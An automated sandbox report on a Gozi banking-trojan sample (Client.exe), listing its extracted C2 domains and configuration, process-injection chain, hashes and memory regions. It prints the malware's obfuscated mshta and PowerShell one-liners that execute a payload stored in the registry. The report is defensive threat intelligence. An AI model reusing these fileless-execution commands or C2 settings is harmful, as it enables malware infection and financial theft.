Analysis
-
max time kernel
182s -
max time network
177s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
11-10-2023 09:07
Static task
static1
Behavioral task
behavioral1
Sample
Client.exe
Resource
win7-20230831-en
General
-
Target
Client.exe
-
Size
406KB
-
MD5
2f5a00394c3568e91f6302dc6c8b196c
-
SHA1
116f6ba99db4592f1ab5ccb1a734fdc5a52021bc
-
SHA256
3a1211935c4bd148eb6fb23c40d4806ee5a488b09bd61b3c0d15a47dbbfe64fd
-
SHA512
a30efa790e3ad7af4e574ef0bf359b6a91691947cf434ddcd30a228af29dea0a9b5c1daff050ecae6e88912e8f04813f1df9680e6fc896cee63e36476e4bbe36
-
SSDEEP
12288:l1HmKzwKhZhZsuyOtldw5hbu5Ty7pySxN1t:bHGKhZzLQ5Wn6H
Malware Config
Extracted
gozi
Extracted
gozi
5050
netsecurez.com
whofoxy.com
mimemoa.com
ntcgo.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
fotexion.com
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Dave packer 1 IoCs
Detects executable using a packer named 'Dave' by the community, based on a string at the end.
Processes:
resource yara_rule behavioral2/memory/4576-1-0x0000000001340000-0x000000000134C000-memory.dmp dave -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
Client.execontrol.exerundll32.exeExplorer.EXEdescription pid process target process PID 4576 set thread context of 3976 4576 Client.exe control.exe PID 3976 set thread context of 3136 3976 control.exe Explorer.EXE PID 3976 set thread context of 2392 3976 control.exe rundll32.exe PID 2392 set thread context of 3136 2392 rundll32.exe Explorer.EXE PID 3136 set thread context of 3740 3136 Explorer.EXE RuntimeBroker.exe PID 3136 set thread context of 4004 3136 Explorer.EXE RuntimeBroker.exe PID 3136 set thread context of 2116 3136 Explorer.EXE RuntimeBroker.exe PID 3136 set thread context of 1016 3136 Explorer.EXE cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Client.exepowershell.exeExplorer.EXEpid process 4576 Client.exe 4576 Client.exe 4112 powershell.exe 4112 powershell.exe 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3136 Explorer.EXE -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
Client.execontrol.exerundll32.exeExplorer.EXEpid process 4576 Client.exe 3976 control.exe 3976 control.exe 2392 rundll32.exe 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE 3136 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 14 IoCs
Processes:
powershell.exeExplorer.EXERuntimeBroker.exedescription pid process Token: SeDebugPrivilege 4112 powershell.exe Token: SeShutdownPrivilege 3136 Explorer.EXE Token: SeCreatePagefilePrivilege 3136 Explorer.EXE Token: SeShutdownPrivilege 3136 Explorer.EXE Token: SeCreatePagefilePrivilege 3136 Explorer.EXE Token: SeShutdownPrivilege 3136 Explorer.EXE Token: SeCreatePagefilePrivilege 3136 Explorer.EXE Token: SeShutdownPrivilege 3740 RuntimeBroker.exe Token: SeShutdownPrivilege 3136 Explorer.EXE Token: SeCreatePagefilePrivilege 3136 Explorer.EXE Token: SeShutdownPrivilege 3136 Explorer.EXE Token: SeCreatePagefilePrivilege 3136 Explorer.EXE Token: SeShutdownPrivilege 3136 Explorer.EXE Token: SeCreatePagefilePrivilege 3136 Explorer.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
Explorer.EXEpid process 3136 Explorer.EXE 3136 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3136 Explorer.EXE -
Suspicious use of WriteProcessMemory 46 IoCs
Processes:
Client.exemshta.execontrol.exerundll32.exeExplorer.EXEpowershell.execsc.execsc.exedescription pid process target process PID 4576 wrote to memory of 3976 4576 Client.exe control.exe PID 4576 wrote to memory of 3976 4576 Client.exe control.exe PID 4576 wrote to memory of 3976 4576 Client.exe control.exe PID 4576 wrote to memory of 3976 4576 Client.exe control.exe PID 4576 wrote to memory of 3976 4576 Client.exe control.exe PID 4776 wrote to memory of 4112 4776 mshta.exe powershell.exe PID 4776 wrote to memory of 4112 4776 mshta.exe powershell.exe PID 3976 wrote to memory of 3136 3976 control.exe Explorer.EXE PID 3976 wrote to memory of 3136 3976 control.exe Explorer.EXE PID 3976 wrote to memory of 3136 3976 control.exe Explorer.EXE PID 3976 wrote to memory of 3136 3976 control.exe Explorer.EXE PID 3976 wrote to memory of 2392 3976 control.exe rundll32.exe PID 3976 wrote to memory of 2392 3976 control.exe rundll32.exe PID 3976 wrote to memory of 2392 3976 control.exe rundll32.exe PID 3976 wrote to memory of 2392 3976 control.exe rundll32.exe PID 3976 wrote to memory of 2392 3976 control.exe rundll32.exe PID 2392 wrote to memory of 3136 2392 rundll32.exe Explorer.EXE PID 2392 wrote to memory of 3136 2392 rundll32.exe Explorer.EXE PID 2392 wrote to memory of 3136 2392 rundll32.exe Explorer.EXE PID 2392 wrote to memory of 3136 2392 rundll32.exe Explorer.EXE PID 3136 wrote to memory of 3740 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 3740 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 3740 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 3740 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 4004 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 4004 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 4004 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 4004 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 2116 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 2116 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 2116 3136 Explorer.EXE RuntimeBroker.exe PID 3136 wrote to memory of 2116 3136 Explorer.EXE RuntimeBroker.exe PID 4112 wrote to memory of 456 4112 powershell.exe csc.exe PID 4112 wrote to memory of 456 4112 powershell.exe csc.exe PID 3136 wrote to memory of 1016 3136 Explorer.EXE cmd.exe PID 3136 wrote to memory of 1016 3136 Explorer.EXE cmd.exe PID 3136 wrote to memory of 1016 3136 Explorer.EXE cmd.exe PID 3136 wrote to memory of 1016 3136 Explorer.EXE cmd.exe PID 3136 wrote to memory of 1016 3136 Explorer.EXE cmd.exe PID 3136 wrote to memory of 1016 3136 Explorer.EXE cmd.exe PID 456 wrote to memory of 4616 456 csc.exe cvtres.exe PID 456 wrote to memory of 4616 456 csc.exe cvtres.exe PID 4112 wrote to memory of 500 4112 powershell.exe csc.exe PID 4112 wrote to memory of 500 4112 powershell.exe csc.exe PID 500 wrote to memory of 4720 500 csc.exe cvtres.exe PID 500 wrote to memory of 4720 500 csc.exe cvtres.exe
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\control.exeC:\Windows\system32\control.exe -h3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>C6an='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(C6an).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD\\\LinkActive'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name spbjcmn -value gp; new-alias -name ugokyvk -value iex; ugokyvk ([System.Text.Encoding]::ASCII.GetString((spbjcmn "HKCU:Software\AppDataLow\Software\Microsoft\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD").PlayPlay))3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wcwewm4x\wcwewm4x.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1469.tmp" "c:\Users\Admin\AppData\Local\Temp\wcwewm4x\CSCCFB8D7E354FB44EE86AA3CE618854048.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4v1l0yo4\4v1l0yo4.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES16F9.tmp" "c:\Users\Admin\AppData\Local\Temp\4v1l0yo4\CSCD7776EEEDCD044C2AF49A07BCED3C0CC.TMP"5⤵
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\4v1l0yo4\4v1l0yo4.dllFilesize
3KB
MD50718594d9107b9c12bbd13ea59b79952
SHA1e8cb4573e136b39215b3197fbc14563eb17daf2b
SHA2565b1ae8af3fada39f1047dc0d65f72289dcea53b0ce801dabf99eb545ac650e8e
SHA512c4c552340bdfd38989691d6d3cf995a6435b0239618331b2e5a1e4650608025fe6268085a79d7cb854e80f767be54f3214f146103270470e46aeddbe1db7a33e
-
C:\Users\Admin\AppData\Local\Temp\RES1469.tmpFilesize
1KB
MD502dbecb898ea9d4645ab822fcf4098fb
SHA14c2390955755357f858fe860ba20998b7d8fc925
SHA2568a74a0e77c590b23788a8c88ea51e87065ad191fc8f5eeb8b3db753e1e539b32
SHA512c798556d9b8cbde668e88e74c3e20d0a6dc8b3f6c0d2adf4c1b0380d5642582f40baca49502a89499d9e4011515eb79c7ee68dafd0e202edab3462cabf51f16b
-
C:\Users\Admin\AppData\Local\Temp\RES16F9.tmpFilesize
1KB
MD581eeaf40f52d7db55ae4799f3c3dbb69
SHA1f85793c45373b43c420dd3a0efbebac7c5b4f849
SHA256c36ca23038f4412d0ea1eda1fd89a4f143d616f9e3a292eaf3a2fde6d8efa278
SHA512f82d5a800871d39d384dbca4d7f25e60ee1cc6ae8ccda38171b2b9382a75f33e5c7ab30ce130586cf3c4e39d555922b1e4fcd252c39e9af05ecaed5d3a2d10a1
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4txaqru4.5uj.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\wcwewm4x\wcwewm4x.dllFilesize
3KB
MD51e47dd279f0e9dd61b94a636116a2855
SHA1ba795923bd08a8f4999e42f48a35b80e878d0236
SHA25616ee241ae2b774be338618b30819de9e2ca38b14db5db975e922504a7151ec8d
SHA512cba903534812f0796f31349426f34da66cb6e6a544337bd7b1a2a651810433b852d4f2081406c3e3cca666939e3d2bdd0145d2513df0fa66cdbcae460e6fa69d
-
\??\c:\Users\Admin\AppData\Local\Temp\4v1l0yo4\4v1l0yo4.0.csFilesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
\??\c:\Users\Admin\AppData\Local\Temp\4v1l0yo4\4v1l0yo4.cmdlineFilesize
369B
MD5bf9e72f9a0e342e183e8eda9f15220bf
SHA1d4da7dc73be51646e6547e51b7cd465f0be54ac4
SHA256f0349687c26a57fb315d248efb4b6962d686dd6fa2684caf83221dd740c5a637
SHA512639f36bdcd46987ee9e499d228acf05173c78cf816806753666ebf184780866d6f4a3135b30b8a8e80f4dcf05562ad8ea9e48646536dede26b728b0722f8e748
-
\??\c:\Users\Admin\AppData\Local\Temp\4v1l0yo4\CSCD7776EEEDCD044C2AF49A07BCED3C0CC.TMPFilesize
652B
MD53d6be2008a1fe74da5792aa9a23caa1c
SHA1865c3daea6cd977a6350e086afd12c2dff2cabbb
SHA256e56e05df7fabd15168bc95eb42d942927d54bad4d400faecdb7861737efd4b1e
SHA51258ec6d36a8c8cc5a908673cd49b7b4157635f4ef243b7c800f9d7c4d699c6d0e6770d2677109c3e6a8240af1a8cf5dc74e6e5eb9d73dd0663066f9abaf444604
-
\??\c:\Users\Admin\AppData\Local\Temp\wcwewm4x\CSCCFB8D7E354FB44EE86AA3CE618854048.TMPFilesize
652B
MD51d7c52ac7f782ace0db09c75dae8bcc0
SHA1b1252d1d47595b4f33f35aa0f3574261ac023bcc
SHA256e42e977e36134a8d739fc61e07b245453797a75d469ff362610b59f579bf744a
SHA5129d10474e511749ff8a02e8147c1520106894ca39b6ddb035d8e1d926811b7995081b3077bef01381fabb456e6128c90b28808c6b573b82b3767b19ceedcb9768
-
\??\c:\Users\Admin\AppData\Local\Temp\wcwewm4x\wcwewm4x.0.csFilesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
\??\c:\Users\Admin\AppData\Local\Temp\wcwewm4x\wcwewm4x.cmdlineFilesize
369B
MD533e455a134ce0cfd1303c8c911e445a0
SHA17fcda010d50a12a9ea45e0d023141817adff991e
SHA256f1302d7448455351710b4c60ab503e09b53f523faf15bfa5e9f6fe13789acc0e
SHA51286b3ffb173838c92fb26da35343b00249fc0ee86c3422528d51589ffab182441737be3d165155b015af61e23f78f744fdc5fa3acd7707921169ea18adfb972f7
-
memory/1016-96-0x0000000000F20000-0x0000000000FB8000-memory.dmpFilesize
608KB
-
memory/1016-89-0x0000000000F20000-0x0000000000FB8000-memory.dmpFilesize
608KB
-
memory/1016-90-0x00000000007C0000-0x00000000007C1000-memory.dmpFilesize
4KB
-
memory/2116-84-0x0000014DC4C20000-0x0000014DC4CC4000-memory.dmpFilesize
656KB
-
memory/2116-82-0x0000014DC43D0000-0x0000014DC43D1000-memory.dmpFilesize
4KB
-
memory/2116-68-0x0000014DC4C20000-0x0000014DC4CC4000-memory.dmpFilesize
656KB
-
memory/2392-55-0x000002068A9C0000-0x000002068AA64000-memory.dmpFilesize
656KB
-
memory/2392-37-0x000002068A9C0000-0x000002068AA64000-memory.dmpFilesize
656KB
-
memory/3136-83-0x00000000089B0000-0x0000000008A54000-memory.dmpFilesize
656KB
-
memory/3136-121-0x00000000089B0000-0x0000000008A54000-memory.dmpFilesize
656KB
-
memory/3136-32-0x0000000008900000-0x00000000089A4000-memory.dmpFilesize
656KB
-
memory/3136-79-0x0000000000C00000-0x0000000000C01000-memory.dmpFilesize
4KB
-
memory/3136-80-0x0000000008900000-0x00000000089A4000-memory.dmpFilesize
656KB
-
memory/3136-46-0x00000000089B0000-0x0000000008A54000-memory.dmpFilesize
656KB
-
memory/3740-58-0x000001BCB9730000-0x000001BCB97D4000-memory.dmpFilesize
656KB
-
memory/3740-87-0x000001BCB9730000-0x000001BCB97D4000-memory.dmpFilesize
656KB
-
memory/3740-86-0x000001BCB95B0000-0x000001BCB95B1000-memory.dmpFilesize
4KB
-
memory/3976-17-0x0000000000620000-0x0000000000621000-memory.dmpFilesize
4KB
-
memory/3976-16-0x0000000000570000-0x0000000000614000-memory.dmpFilesize
656KB
-
memory/3976-56-0x0000000000570000-0x0000000000614000-memory.dmpFilesize
656KB
-
memory/4004-81-0x00000257E6830000-0x00000257E68D4000-memory.dmpFilesize
656KB
-
memory/4004-85-0x00000257E67F0000-0x00000257E67F1000-memory.dmpFilesize
4KB
-
memory/4004-63-0x00000257E6830000-0x00000257E68D4000-memory.dmpFilesize
656KB
-
memory/4112-101-0x000002C6F4900000-0x000002C6F4908000-memory.dmpFilesize
32KB
-
memory/4112-78-0x000002C6DC280000-0x000002C6DC290000-memory.dmpFilesize
64KB
-
memory/4112-30-0x000002C6F4930000-0x000002C6F4952000-memory.dmpFilesize
136KB
-
memory/4112-88-0x000002C6DC280000-0x000002C6DC290000-memory.dmpFilesize
64KB
-
memory/4112-76-0x00007FF86E150000-0x00007FF86EC11000-memory.dmpFilesize
10.8MB
-
memory/4112-115-0x000002C6F4920000-0x000002C6F4928000-memory.dmpFilesize
32KB
-
memory/4112-117-0x000002C6F4CA0000-0x000002C6F4CDD000-memory.dmpFilesize
244KB
-
memory/4112-119-0x00007FF86E150000-0x00007FF86EC11000-memory.dmpFilesize
10.8MB
-
memory/4112-77-0x000002C6DC280000-0x000002C6DC290000-memory.dmpFilesize
64KB
-
memory/4576-1-0x0000000001340000-0x000000000134C000-memory.dmpFilesize
48KB
-
memory/4576-11-0x0000000001510000-0x000000000151D000-memory.dmpFilesize
52KB
-
memory/4576-5-0x0000000000400000-0x000000000040F000-memory.dmpFilesize
60KB
-
memory/4576-0-0x0000000001350000-0x000000000135F000-memory.dmpFilesize
60KB